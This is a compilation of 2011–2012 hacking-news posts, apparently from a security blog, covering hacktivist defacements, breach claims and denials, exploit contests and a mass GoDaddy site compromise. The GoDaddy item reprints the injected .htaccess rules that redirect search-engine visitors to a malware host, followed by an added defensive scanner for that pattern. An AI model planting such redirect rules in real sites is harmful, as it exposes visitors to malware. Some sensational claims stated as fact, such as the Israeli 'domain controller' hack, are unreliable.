
Hack In Paris - International Security Conference

Dear friends, have you planned anything for this summer? If not, we have a suggestion for you, and we hope you will like it. From 18th-22nd June an international security conference will take place at Disneyland, Paris. We are sure that most of you would love to spend this summer in Paris. OK, now let's come to the point. Since 2004, Sysdream and HZV have been organizing an event named "Nuit du Hack" (Hacker's Night) in Paris, France. After the success of this year's edition, with more than 950 attendees, the organizers have planned an international and corporate event named "Hack In Paris", aiming to bring together security professionals and enthusiasts. Hack In Paris will focus on the latest advances in IT security.
The conference will be held at the Disneyland Paris Conference Centre from June 18th to 22nd, 2012. Also at Disneyland Paris this year, from 23 to 24 June 2012, we will celebrate 10 years of the Nuit du Hack. The venue is easily accessible by train (a 15-minute ride) from downtown Paris and the airports.

Topics:-
The following list contains the major topics the conference will cover. Please consider submitting even if the subject of your research is not listed here.
  • Advances in reverse engineering
  • Vulnerability research and exploitation
  • Penetration testing and security assessment
  • Malware analysis and new trends in malicious code
  • Forensics, IT crime & law enforcement
  • Privacy issues: LOPPSI, HADOPI, ...
  • Low-level hacking (console security & mobile devices)
  • Risk management and ISO 27001



-Source (Hack In Paris)



Unpatchable Security Hole in PlayStation 3 Leading The "final hack" Also LV0 Cryptographic Keys Revealed


We are all well aware that Sony and its products have always been a favorite target of hackers. But here there are a few twists, so the word 'hack' is the appropriate one to describe what happened to Sony. According to a report on Eurogamer, Sony's PlayStation 3 is facing a new security threat, one it hasn't seen since the system was cracked via the PSJailbreak in 2011. The PS3 has been hacked before, but Sony was able to inhibit the hack with an update to its own firmware. This is much like the history of jailbreaking on Apple's iOS. But the latest PS3 break is being dubbed unpatchable and the final hack. That's because this hack isn't giving you an exploit to use against a programming hole. It's giving you Sony's so-called LV0 (level zero) cryptographic keys.
A decryption key that is reported to be circulating on the net is said to remove the final protective barrier on some models of Sony's PlayStation 3 consoles. In the long run, the release of the key will probably allow unsigned software such as homebrew games, Linux distributions, or pirate copies of software to run on some PS3 consoles. Allegedly, the private key can be used to modify and sign the "LV0" (Level 0), for example to disable its security checks. When the PS3 system boots, from version 3.60 of the PS3's firmware, the LV0 is directly launched by the bootloader (bootldr) that is built into the system's hardware, which means that the chain of trust is broken at a very early stage. As Sony won't be able to update the bootloader with a software update, the hacker community considers this the "final hack" of the PS3 in its current form. Eurogamer says that these keys may not have been released at all if not for a Chinese hacking outfit called "BlueDiskCFW," who gained access to the keys and planned to charge for new custom firmware updates it would create. The original group that created the LV0 had no plans to release them, but eventually they were leaked onto the Internet in some limited fashion. Seeing that someone was going to profit from them, the group known as "The Three Tuskateers" decided to release them into the wilds of the Internet.
In a statement, the hacker group says: "You can be sure that if it wouldn't have been for this leak, this key would never have seen the light of day, only the fear of our work being used by others to make money out of it has forced us to release this now."






Flickr Is Developing Their New Tool For Photo Hack Day


Just in time for the August 20-21 Photo Hack Day, Flickr has unleashed some new tools for providing real-time photo data to web apps. That means you can soon look forward to apps that make more extensive, and more immediate, use of what’s going on in your Flickr photo stream and those of your friends.
Back in June, the photo-sharing service allowed developers to access photos and favorites from a user’s contacts in their applications using some of Flickr’s nifty PuSH API methods.
As Flickr’s “nils” noted in the Flickr developer blog, those methods were “pretty neat, but that barely scratches the surface of stuff that happens on Flickr that people might be interested in. So we added some more stuff to subscribe to.”
The new APIs make use of Pubsubhubbub (for instant notifications when something is published — say, a new photo) and allow developers to grab a lot more interesting data for their users, including:

    Photos of you
    Photos of your contacts
    Your photos and favorites
    Photos from a specific area (using geodata)
    Photos with a certain tag or tags
    Images from the Flickr Commons
    And, of course, photos and favorites from your contacts


When grabbing photos from the Commons, you can specify a particular institution or institutions to pull from — for example, you could just get pics from the Smithsonian and the White House. Or, you could scrape all photos and updates from the Flickr Commons in real time.
As for geodata, you can specify an area using a point and radius or a set of WOE IDs, then subscribe to images from that area. This would be handy for getting a real-time stream of photos of tourists “holding up” the Leaning Tower of Pisa, to name a terrible example that should never be implemented by anyone.
Etsy developer Kellan Elliot-McCrea was kind enough to post about how to get started with the new APIs, including some lovely PHP snippets.
Flickr will be at Photo Hack Day (or, more accurately, Photo Hack Weekend) in New York City this weekend. Flickr dev Paul Mison will be on hand to talk about the Flickr APIs and answer questions.


-News Source (Dev Beat & Photo Hack Day)


PSN Hacked Again By Anonymous! 10 Million Users Affected [Sony Denies The Hack]


Oh no, the Sony PlayStation Network has faced a cyber attack again. Guess who was behind this? Yes, this time too the hacker collective Anonymous has breached the PSN and stolen more than ten million account details (email IDs and encrypted passwords). Anonymous announced the hack on its Twitter account on Wednesday (though that tweet has since been removed).

The tweet claimed that Anonymous has yet again broken into the PlayStation Network and has a 50 gigabyte database of email accounts and their passwords, which would put more than ten million accounts at risk. This would be a huge blow to Sony if Anonymous has in fact completed a successful PSN hack and PlayStation Network breach. If PSN has been breached, millions of users' personal information, including credit cards, would be in the hands of potentially malicious users.
Note, however, that Sony completely denies the hack. The official Twitter account of PSN says: "We can confirm that the recent claim that PSN was illegally hacked & that customer PWs and email addresses were accessed is completely false".

Kotaku reports that the list in the Pastebin doc is a copy of a seemingly unrelated list of email addresses from March 2012, called "Email accs! // universe security sucks." The PSN hack, in other words, appears to be a rumor that didn't turn out to be true. But we still have to wait for Sony's official response on the whole matter.
Since last year a battle has been running between the hacktivists Anonymous and LulzSec and Sony. Hackers penetrated Sony's PSN network and stole millions of users' personal information. Sony was later forced to shut down its entire network and apologized for the whole incident. Not only PSN: Sony Online Entertainment, Sony Pictures and several of Sony's official websites in different countries also fell victim to the hackers.





HP Training Center Official Website Hacked & Defaced

The official website of the Hewlett Packard Training Center, also known as the HP Training Center, has been hacked. Once again the well-known Pakistani hacker known as 'Hitcher', from the hacker collective Pak Cyber Force (PCF), took responsibility for this hack. His last hack took down the official website of NIOS, and here he followed the same approach: in spite of having full privileges on the HP server, the hacker did not harm the main index. He just uploaded his deface page, as shown in the above picture. This hack also compromised three HP sub-domains, among them Designjet - Sales Training and Development Center, HP Indigo Training Center and one more. As expected, Hitcher has also created a deface mirror on Zone-Hack. This cyber attack took place yesterday, and the deface page uploaded by the hacker still exists on the web server. Such carelessness or irresponsibility is not at all expected from a company like HP. Hitcher is widely known for defacing high-profile websites; his last few high-profile hacks were Bank of Punjab, Kingfisher Airlines, Central Statistical Agency of Ethiopia and 100+ Chinese Govt websites. The hacker's message on the deface page clearly indicates that the hack was motivated by the cause of Palestine, though it is not clear why he targeted HP, because there is no relation between HP and the inhuman torture in Palestine.

Message of the Hacker:- 
"Free Palestine . . . We will not go down..Freedom is our goal. .// End the Occupation. . . . .
You the Zionist Government of Israel have been murdering thousands and thousands of innocent Palestinian people for years and enough is enough! The land you call Israel is occupied illegally and is not and will never be yours and the fight to free the Palestinian people and their land from your evil clutches will continue! You continue to try and play the victim in all this bloodshed, yet we have all seen and know you are the murderers, suppressors, rapists and terrorists in this bloody war!
You have NO Israeli culture, NO history in Gaza, nor in the West Bank or in Great Palestine. The only history you the Zionist Terrorist Israel are leaving for your future children is of BLOODSHED, TEARS and LOSS OF LIFE and that is not something to be proud of. To call the land you illegally occupy "Israel" is not only misguided, it is tragic and leaves a very foul taste in the mouths of millions of people who stand against you.
Israel your idea of the peace process is surrender or war and we will not surrender! This is not a war against race, religion nor sex, but a fight against the suppression, murders, and rapes of millions of Palestinians that occurs on a daily basis by you the Zionists. 
To the people of Palestine we have not forgotten you, nor will we ever forget you and as long as we are still breathing we will continue to grow stronger and will fight for your freedom!
LONG LIVE PALESTINE.."





Facebook Denies The Hack-Activity Of Team Swastika


We are aware that a recently formed hacking crew from Nepal called "TeamSwaStika" hacked more than 10 thousand Facebook accounts. TeamSwaStika posted those hacked accounts openly on Pastebin; the post was later removed for violation. They also reported their hack to VOGH. If you dig into the statistics, you will find that it is one of the biggest attacks on Facebook users, because TeamSwaStika grabbed more than 10K log-in details of Facebook users.
But Facebook completely denies this hack activity and said Team Swastika's supposed hack of account logins was no hack at all. Facebook looked into the issue and said the details did not relate to any active accounts. "This does not represent a hack of Facebook or anyone’s Facebook profiles," a Facebook spokesperson said.
"Our security experts have reviewed this data and found it to be a set of e-mail and password combinations that are not associated with any live Facebook accounts." 
Facebook said Trend Micro's use of the term "hacked" was "simply wrong." Ferguson never indicated Facebook itself had been hacked, however, and the social network said the data had been taken in a phishing attack.




Israel Ministry of Finance Unit (Lehava) Hacked By Hitcher

Israel Ministry of Finance Unit (Lehava) Hacked By Hitcher To Protest Against Mr.Badoo's Arrest By FBI

The official website of the Government of Israel's Ministry of Finance Unit (Lehava) has been hacked. According to sources, a well-known Pakistani hacker code-named Hitcher, from the hacker collective Pak Cyber Force (PCF), was behind this attack. Though the hacker did not change the index page, he managed to gain access to Lehava's web server and uploaded his own page, which clearly shows the reason for this hack. The hacker has also created a deface mirror on Zone-Hack. We would also like to remind you that earlier this year Hitcher also hacked Amitec, one of the top innovative IT companies of Israel.

Message of the Hacker:- 

"Site is Defaced In Protest of Ali Hassan aka Mr.Badoo Arrested By FBI 
His Charges was hacking into PC of Andy who create any event of drawing Prophet Muhammad’s(SAW).
He hacked Andy account and remove that event from facebook
His Protest of Hack was Positive Just to Stop That events and His Message was clear That Respect each other and Each other Religion Too He neither Public Andy Data and personal info ..."

Hitcher also vows to engage in more cyber attacks, saying "This Hack is just A Protest We want Him Free, and Its Just a trailer..". Hitcher is widely known for defacing high-profile websites. Here I am mentioning a few of his activities; his high-profile hacks include an official website of KingFisher Airline, United Bank of India, IDBI Paisabuilder, Central Statistical Agency of Ethiopia, 100+ Chinese Govt websites and many more.





25 Years Old Guy Busted While Attempting to Hack Facebook Server

A 25-year-old Brit allegedly used "considerable technical expertise" to hack into Facebook's servers.
Student Glenn Steven Mangham from York is currently on trial at Westminster magistrates' court on five charges under the Computer Misuse Act, including adapting, supplying or offering to supply software that ensures users can hack into Facebook's servers.

Mangham was arrested by the Metropolitan Police's Central e-Crime Unit in June this year for "computer hacking offences".
It is alleged that between April 27 and May 9, Mangham hacked several times into a Facebook puzzle server that allows developers to test their skills. Furthermore, it is also alleged he attempted to hack into a Facebook mailman server that manages email distribution lists, as well as trying to gain access to the Facebook phabricator server, which offers tools for third-party app developers.
"This is what can be described as a hacking case," lawyer for the prosecution, Matthew McCabe, said.
While on bail, Mangham has been barred from accessing the web from any device.

"The court feels it will be safer if there was no access to the internet which will reduce the temptation for your son to go on to Facebook," said Judge Nicholas Evans, who is presiding over the case.

Facebook said no personal details had been compromised during the attempted hacks and the social network had been working with Scotland Yard and the FBI as they "take any attempt to hack our internal systems extremely seriously".
According to a news daily, this is one of the first investigations into a hacking attempt on the social network, and detectives were not aware of any hacking attempts "to this extent".

-News Source (Pc Advisor)


The Reason Behind The Massive Cyber-attack On godaddy.com Was A Malware


Hundreds of Go Daddy sites were compromised to point towards a site hosting malware last weekend. The mass hack of around 445 sites involved the injection of hostile code into the .htaccess files of the sites. 
Code:-
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L] 
Go Daddy quickly removed the hostile code before working with its customers to take back full control of the sites, which were reportedly compromised by a password hack.
Go Daddy’s chief information security officer, Todd Redfoot, told Domain Name Wire: "The accounts were accessed using the account holder’s username and password.”
It's unclear how the passwords needed to pull off the attack were obtained, but some sort of targeted phishing attack is one likely explanation. Go Daddy's investigation into the attack continues but Redfoot suggested the blame for the mass hack was outside Go Daddy's control.
"This was not an infrastructure breakdown and should not impact additional customers," he said.
Web security monitoring firm Sucuri warned of the mass hack on Thursday. Its blog post about the attack suggests the malicious code was targeted towards surfers visiting the affected domains via Google or other search engines rather than those who had arrived directly. Such trickery is often part and parcel of search engine manipulation attacks designed to redirect surfers hunting for content related to items in the news towards scareware portals. This kind of trickery often takes advantage of insecure WordPress installations and the like, so the apparent use of password-snaffling trickery in this case suggests the bad guys are becoming more aggressive in their hunt for sites they can abuse for their own malicious ends.

-News Source (Register)
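
For site owners auditing their own hosting accounts, the injected pattern described above (RewriteCond lines on HTTP_REFERER followed by a RewriteRule to a foreign host) can be detected mechanically. The following scanner is an added example, not code from the original article or from Go Daddy or Sucuri; the function names, the sample files and the hosts `redirect-target.example` and `shop.example` are constructed for illustration.

```python
"""Flag .htaccess rewrite blocks that send visitors to another host only
when the Referer header matches, the pattern of the injected code above."""
from urllib.parse import urlparse

# Substrings identifying the search engines named in the injected rules.
SEARCH_ENGINE_HINTS = ("google", "bing", "yahoo", "ask.com", "msn",
                       "live.com", "aol", "altavista", "excite")


def parse_rewrite_blocks(text):
    """Group each RewriteRule with the RewriteCond lines that precede it
    (mod_rewrite applies conditions only to the next RewriteRule)."""
    blocks, conds = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            conds.append((parts[1], parts[2]))      # (test string, pattern)
        elif directive == "rewriterule" and len(parts) >= 3:
            blocks.append({"line": lineno, "conds": conds, "target": parts[2]})
            conds = []
    return blocks


def find_referer_redirects(text, own_hosts=()):
    """Return findings for rules that redirect to a host outside own_hosts
    when a (non-negated) Referer condition matches."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for block in parse_rewrite_blocks(text):
        referer_patterns = [p for var, p in block["conds"]
                            if var.upper() == "%{HTTP_REFERER}"
                            and not p.startswith("!")]
        if not referer_patterns:
            continue
        # An absolute URL to another host makes mod_rewrite issue an
        # external redirect, with or without the R flag.
        host = (urlparse(block["target"]).hostname or "").lower()
        if not host or host in own:
            continue
        engines = sorted({hint for hint in SEARCH_ENGINE_HINTS
                          for p in referer_patterns if hint in p.lower()})
        findings.append({"line": block["line"], "host": host,
                         "engines": engines,
                         "severity": "high" if engines else "review"})
    return findings


# Constructed sample modelled on the injected block quoted in the article.
INJECTED_SAMPLE = """\
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://redirect-target.example/in.php?g=916 [R,L]
"""

# Constructed legitimate file: hotlink protection and a canonical-host redirect.
BENIGN_SAMPLE = r"""RewriteEngine On
# block image requests coming from other sites
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?shop\.example/ [NC]
RewriteRule \.(jpe?g|png)$ - [F]
RewriteCond %{HTTP_HOST} !^www\.shop\.example$ [NC]
RewriteRule ^(.*)$ https://www.shop.example/$1 [R=301,L]
"""

if __name__ == "__main__":
    for name, sample in (("injected", INJECTED_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, find_referer_redirects(sample, own_hosts=["www.shop.example"]))
```

Because the redirect fires only for visitors arriving from a search engine, an owner who types the site address directly never sees it, which is why checking the file contents is more reliable than browsing the site.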


#OpIsrael Continues: KHS & MLA Hacked Several Israeli Govt Websites & Leaked Sensitive Data

Muslim Liberation Army (MLA) & Kosova Hacker Security (KHS) Join Operation Israel & Hack Several Israeli Govt Websites & Leak Sensitive Data

Operation Israel, the devastating hacking rampage, continues and is becoming more and more venturesome for Israeli cyberspace. In the last week of March, it was the dangerous hacker collective Anonymous that called the operation, also dubbed #OpIsrael, in which the hacker group vows to erase Israel from the Internet. And as expected this is happening: the first quake came from the Turkey-based Marxist hacker group RedHack and Anonymous, who targeted the Israeli intelligence agency Mossad and breached the personal data of 35K officials. Operation Israel was not one of Anonymous's typical rampages; here Anon called on other hackers from different parts of the spectrum to join. First it was RedHack who responded, and now the Muslim Liberation Army, led by Pakistani hacker Hitcher, along with Kosova Hacker's Security and a few other Albanian hacker communities, has joined #OpIsrael.
Yesterday it was Hitcher from the Muslim Liberation Army (MLA) who targeted Israel's Ministry of National Infrastructures (MNI). The hacker managed to breach the ministry's server and defaced several websites belonging to the Israel Ministry of Infrastructures. The attack took place late last night, and at the time of writing several Israel MNI websites are still not functioning. Not only MNI: according to sources, several other high-profile Israeli government sites have also been taken down in this round of attacks. While covering this hack by Hitcher, we must recap the previous hacks by Pakistani hackers, who are constantly acting against Israel (over the Gaza issue) with massive cyber attacks against Israel's leading IT industry and other high-profile Israeli sites. Just a couple of months ago, the world saw what was called the black day in the history of Israeli cyberspace, when another Pakistani hacker community hacked the main domain controller of Israel, which caused a massive hack against almost all the big Israeli sites such as government, MSN, Bing, Live, Skype, Microsoft Store, BBC, CNN, Coca-Cola, XBOX, Windows, Intel and many more.


During the hacking rampage, Hitcher delivered the following message - 
“We are outraged at the Palestine present condition and the Illegal occupation of Palestinian Land By the Zionist Israelis. This attack is in response to the Injustice against the Palestinian people. Occupied Palestinian land under the guise of residential settlements are being increased. Palestinians are deprived of their basic human rights. International Aid workers are stopped from providing any humanitarian assistance to the people. The International community and media is not allowed to bring facts to world as due to strict restrictions” 

On the other hand, Kosova Hacker's Security, along with a few other Albanian hacker communities, performed what it called a demolishing cyber attack that caused huge damage to Israeli cyberspace. During the attack Kosova Hacker's Security, also known as KHS, hit several important Israeli government and commercial websites such as the Civil Aviation Authority, Israel Police, Ministry of Health and many more. KHS caused damage to those websites not by defacement but by causing data leaks. KHS hacked and exposed thousands of sensitive records, including full names, email IDs, passwords and other confidential information from those Israeli websites. All the leaked data has been made available by the hackers on a website called pentagoncrew.com. All those hacks have been performed under the banner of Operation Israel, also dubbed #OpIsrael, for the cause of Gaza. For instance, here we can recap the hack by Kosova Hackers Security (KHS) in which they hacked and exposed the personal data of 35,000 Israeli people.

In conclusion, we want to say that when Anonymous first called Operation Israel, the Israeli government indicated that it had taken the threat very seriously, and from the government's end it was stated that it would take almost every step to avoid any kind of disaster. Now, after observing the above scenario, it is clear that the Israeli government has completely failed to protect its cyberspace, in spite of taking precautions. Another thing has also come into the spotlight: different hacker communities have already come under a single banner in order to hit Israel over the Gaza and Palestine issue. Today is the historic 7th April, the day on which Anonymous promised to erase Israel from the Internet. So the clock is running; let's see what more is about to come. For the time being, stay tuned with VOGH to get all the latest updates on this story and on other cyber issues.








Bangladeshi Prime Minister's Email-id Hacked By Teamgreyhat


After remaining silent for a certain time, hacktivist group Teamgreyhat strikes again. Past records say this hacker group is known for hacking a large number of sites, but this time they did something different. Here the target was Sheikh Hasina, Prime Minister of Bangladesh. Teamgreyhat took responsibility for hacking into the official email ID of the Bangladesh PM (pm@pmo.gov.bd). They have also claimed to have access to the other 73 email IDs of the Bangladesh Prime Minister's Office. Teamgreyhat have submitted the following screenshots:

The above screenshots were taken during the hack (submitted by TGH) and clearly indicate that the hacker group has successfully breached the webmail of the Bangladesh Prime Minister's Office and exported all the emails from pm@pmo.gov.bd. For security reasons we are not publishing the password of the above mail ID. Earlier this group played a major role in the past cyber-war between India and Bangladesh, hacking into the Bangladeshi Stock Market, Islami Bank Ltd Bangladesh and a few other high-profile BD websites. We want to remind you that at the time of the Islami Bank hack TGH claimed that they had breached the BD Prime Minister's Office (PMO) and BD Parliament network and gained more than 40 GB of sensitive BD government data. So it can be expected that they stole the BD PM's passwords at that time. Teamgreyhat did not, however, specify the reason for this hack.
A few months ago we saw a similar hack, when the victim was Syrian President Bashar Assad. Hacker group Anonymous took responsibility for that hack. After the hacked mails were exposed, we also saw many untold stories come out of them, which could even lead to modern warfare. Now the same thing has been repeated by TGH, so let's see what we will get in future.





Massive Phishing Scheme Originating from China, said Google


Hundreds of personal Gmail accounts, including those of some senior U.S. government officials, were hacked as a result of a massive phishing scheme originating from China, Google said Wednesday. The account hijackings were a result of stolen passwords, likely by malware installed on victims' computers or through victims' responses to e-mails from malicious hackers posing as trusted sources. That type of hack is known as phishing. Gmail's security systems themselves were not compromised, Google said. The company believes the phishing attack emanated from Jinan, China. In addition to the U.S. government personnel, other targets included South Korean government officials and federal workers of several other Asian countries, Chinese political activists, military personnel and journalists. The news comes a little more than a year after a separate hack originating from China affected Gmail accounts of Chinese human rights activists. In that case, attackers were able to break through Google's security systems, and two Gmail accounts were hacked.
That cyber attack set off a series of events that eventually led to Google ending its agreement with the Chinese government to censor certain search results, and the company physically moved its servers out of the country.
This time around, the hack appears larger in scope -- but Google itself was not attacked. A person with knowledge of the attack's details said there was no apparent correlation between last year's attack and this one.
A spokesman from Google declined to comment on how the company obtained the information about the most recent hack. Public information, user reports and a third-party hacking blog called Contagio were used to determine the scope, targets and source of the attack. Google (GOOG, Fortune 500) said it notified the victims and disrupted the campaign. The hackers were attempting to monitor the victims' e-mails, and some users' forwarding settings were altered. The company urged users to "please spend ten minutes today taking steps to improve your online security so that you can experience all that the Internet offers -- while also protecting your data." Google provided several examples on its blog of how Gmail users can better protect themselves from phishing attacks, including enabling a setting that allows users to log in to their accounts only after receiving a verification code on their phones. The company also suggested that users check their account settings for suspicious forwarding rules.


After Google Chrome Hack Sergey Glazunov Earned $60,000 At Pwnium Contest

Sergey Glazunov, A Security Researcher, Earns $60,000 At Pwnium After Google Chrome Hack

Sergey Glazunov, a Russian security researcher has earned $60,000 by demonstrating how he could waltz past the security sandbox in Google's Chrome browser to run unauthorized code on fully-patched Windows 7 computers. Glazunov discovered a remote code execution vulnerability in Chrome, that could be used by malicious hackers and cyber criminals to install and run code on innocent users' computers, just by them visiting a website. Glazunov, who is no stranger to reporting bugs in Chrome, won his substantial reward as part of the Pwnium competition run by Google at the CanSecWest conference in downtown Vancouver.
Senior Vice President of Google Chrome and Apps, Sundar Pichai, confirmed the successful hack on his Google+ page. Now that the hack is known throughout the developer world, Pichai understandably said, “Congrats to long-time Chromium contributor Sergey Glazunov who just submitted our first Pwnium entry. Looks like it qualifies as a “Full Chrome” exploit, qualifying for a $60k reward. We’re working fast on a fix that we’ll push via auto-update. This is exciting; we launched Pwnium this year to encourage the security community to submit exploits for us to help make the web safer. We look forward to any additional submissions to make Chrome even stronger for our users.”




The Stratfor Hack Was Not The Work Of Anonymous


Yesterday we covered a story saying that U.S. security think tank Stratfor was hacked by Anonymous. Later Anonymous completely denied this hack. In the official press release, Anon clearly said that Stratfor is an open source intelligence agency, publishing daily reports on data collected from the open internet. Hackers claiming to be Anonymous have distorted this truth in order to further their hidden agenda, and some Anons have taken the bait. They have also confirmed that the hackers - who may be linked to Sabu of LulzSec fame - managed to steal Stratfor's confidential client list and mined over 4,000 credit card numbers, passwords and home addresses.

Press Release of Anonymous:- 
"Emergency Christmas Anonymous Press Release
-------------------------------------------
12/25/2011


THE STRATFOR HACK IS NOT THE WORK OF ANONYMOUS


Stratfor is an open source intelligence agency, publishing daily reports on data collected from the open internet. Hackers claiming to be Anonymous have distorted this truth in order to further their hidden agenda, and some Anons have taken the bait.


The leaked client list represents subscribers to a daily publication which is the primary service of Stratfor. Stratfor analysts are widely considered to be extremely unbiased. Anonymous does not attack media sources. In this excerpt from Time, there is a brief description of how Stratfor analysts uncovered a possible US backed coup in Iraq preceding the US invasion.


"In the past month Stratfor has drawn attention to a carefully assembled open-source report that asserted that last month's attack on Iraq wasn't intended just to punish Saddam Hussein for blowing off U.N. weapons inspectors. By sorting through thousands of pieces of publicly available data--from Middle East newspapers to Iraqi-dissident news--Stratfor analysts developed a theory that the attacks were actually designed to mask a failed U.S.-backed coup. In two striking, contrarian intelligence briefs released on the Internet on Jan. 5 and Jan. 6, Stratfor argued that Saddam's lightning restructuring of the Iraqi military, followed by executions of the army's Third Corps commanders, was evidence that the coup had been suppressed. Predictably, U.S. officials said the report was wrong."


Stratfor has been purposefully misrepresented by these so-called Anons and portrayed in false light as a company which engages in activity similar to HBGary. Sabu and his crew are nothing more than opportunistic attention whores who are possibly agent provocateurs. As a media source, Stratfor's work is protected by the freedom of press, a principle which Anonymous values greatly.


This hack is most definitely not the work of Anonymous.


We are Anonymous
We do not forgive
We do not forget
Expect us..."






Two Romanian Hackers Pleaded Guilty on Credit Card Hack & Faced 7 Years Imprisonment


According to the U.S. Department of Justice, two Romanian hackers, Iulian Dolan and Cezar Butu, have pleaded guilty to participating in a US$10 million scheme to hack into the computers of hundreds of Subway restaurants in the U.S. and steal payment card data. Iulian Dolan, 28, of Craiova, Romania, pleaded guilty Monday to one count of conspiracy to commit computer fraud and two counts of conspiracy to commit access device fraud, and Cezar Butu, 27, of Ploiesti, Romania, pleaded guilty to one count of conspiracy to commit access device fraud, the DOJ confirmed. Dolan and Butu were two of four Romanians charged in December in U.S. District Court for the District of New Hampshire with hacking Subway point-of-sale computers. In his plea agreement, Dolan has agreed to be sentenced to seven years, and Butu has agreed to be sentenced to 21 months in prison. The two men, in their guilty pleas, acknowledged participating in a Romanian-based conspiracy, lasting from 2009 to 2011, to hack into hundreds of U.S. point-of-sale (POS) computers. Co-conspirator Adrian-Tiberiu Oprea is in U.S. custody and awaiting trial in New Hampshire. The group used stolen payment card data to make unauthorized charges or to transfer funds from the cardholders' accounts. The scheme involved more than 146,000 compromised payment cards and more than $10 million in losses.
During the conspiracy, Dolan remotely scanned the Internet to identify vulnerable POS systems in the U.S. with certain remote desktop software applications (RDAs) installed on them. Using these RDAs, Dolan logged onto the targeted POS systems over the Internet. The systems were often password-protected and Dolan attempted to crack the passwords to gain administrative access. 
He then installed keystroke logging software onto the POS systems and recorded all of the data that was keyed into or swiped through the POS systems, including customers' payment card data. Thus Dolan managed to steal payment card data belonging to approximately 6,000 cardholders. Dolan received $5,000 to $7,500 in cash and personal property from Oprea for his efforts.
In his plea agreement, Butu said he repeatedly asked Oprea to provide him with stolen payment card data and that Oprea provided him with instructions for how to access the website where Oprea had stored a portion of the stolen payment card data. Butu later attempted to use the stolen payment card data to make unauthorized charges on, or transfers of funds from, the accounts. He also attempted to sell, or otherwise transfer, the stolen payment card data to other co-conspirators. Butu acquired stolen payment card data from Oprea belonging to approximately 140 cardholders.
When talking about Romanian hackers, one name definitely comes to mind: Razvan Manole Cernaianu, aka "TinKode", who was busted earlier this year on charges of hacking into Pentagon and NASA servers and stealing confidential data. Also, last year another 26-year-old Romanian hacker faced imprisonment for hacking into NASA servers.


-Source (CSO)






Department of Homeland Security & U.S. Navy Hires Company To Hack Into Video Game Consoles


The U.S. government has hired a California-based company to hack into video game consoles, such as Xbox 360 and PlayStation 3, to watch criminals, especially child predators, and learn how to collect evidence against them. The $177,000 contract with Obscure Technologies of San Rafael, Calif., is being executed by the U.S. Navy on behalf of the Department of Homeland Security because of the Navy’s expertise in the field, officials said. Under the contract, Obscure Technologies will purchase used gaming systems from abroad that are believed to hold “sensitive information from previous users” and try to hack into them. Obscure’s experts will then report back on how they gained access to the systems, provide instructions to obtain users’ chat room activity, and even report back on the data gleaned, according to the contract and tasking documents. Obscure will also purchase new systems and construct a device that can capture data and activity, the documents state.
Over the past few decades, video game systems have grown in sophistication and capabilities by leaps and bounds. Consoles like the Nintendo Wii, Sony PlayStation 3, and Microsoft Xbox can be found in many U.S. households and are popular among servicemembers, with Internet access and hard drives that rival personal computers.
With these advances, Garfinkel said, the systems have become a playground of illegal activity for criminals. In 2008, law enforcement agencies contacted the DHS’s Science and Technology Directorate and requested help in analyzing gaming systems seized during court-authorized searches, Garfinkel said. While some tools exist to extract data from gaming consoles, the consoles are hard to crack as they are designed with copyright protection systems, he said. Navy and DHS officials declined to comment on whether the gaming consoles of Americans will ever be hacked and monitored. They also declined to comment as to whether the system manufacturers had been approached about this research.


-Source (Stars & Stripes)



JailbreakMe Security Flaws Will be Patched by Apple


Shortly after the JailbreakMe hack that uses Mobile Safari to jailbreak iPhones, iPads and the iPod touch hit the Web, Apple announced that it will be patching the potential security flaw the hack takes advantage of, according to Yahoo! Finance.
Jailbreaking is a process that hacks iOS so third-party apps that aren’t available through Apple’s iTunes-based App Store can be installed. Unlike other jailbreak tools, JailbreakMe doesn’t require a computer to handle the hacking process. Instead, users only need to go to the JailbreakMe Web site on their iPhone, iPod touch or iPad, and the security flaw the hack takes advantage of is exactly what Apple plans to patch. 
While patching the flaw will take away the ease of use that JailbreakMe offers, it will also block a security flaw that could potentially be used for more nefarious deeds. The flaw uses specially crafted PDF documents to install software on users’ iOS devices, potentially without their permission or knowledge. So far, there aren’t any reports of malicious uses of the flaw, only the JailbreakMe hack.
Bethan Lloyd, a spokesperson for Apple, said the company is “aware of this reported issue and developing a fix that will be available to customers in an upcoming software update.” There isn’t any word yet on when to expect the security update to be released.

-News Source (Mac observer)


iPhone 4S Hacked By Dutch Researchers During Pwn2Own Contest

iPhone 4S Hacked By Dutch Researchers During Pwn2Own Contest & Won $30,000 Prize
 

The so-called fully patched and secured iPhone 4S has fallen victim to hackers. During a Pwn2Own contest, two Dutch researchers were able to hack a fully patched iPhone 4S and obtain a slew of information from the device. The hackers, Joost Pol and Daan Keuper, found a vulnerability in WebKit that allowed them to hijack photos, videos, address book contacts, and browsing history right from the phone. The two earned a $30,000 cash prize for performing what they call “a clean hack.”

That was the intellectual challenge that drove a pair of Dutch researchers to start looking for an exploitable software vulnerability that would allow them to hijack the address book, photos, videos and browsing history from a fully patched iPhone 4S. 
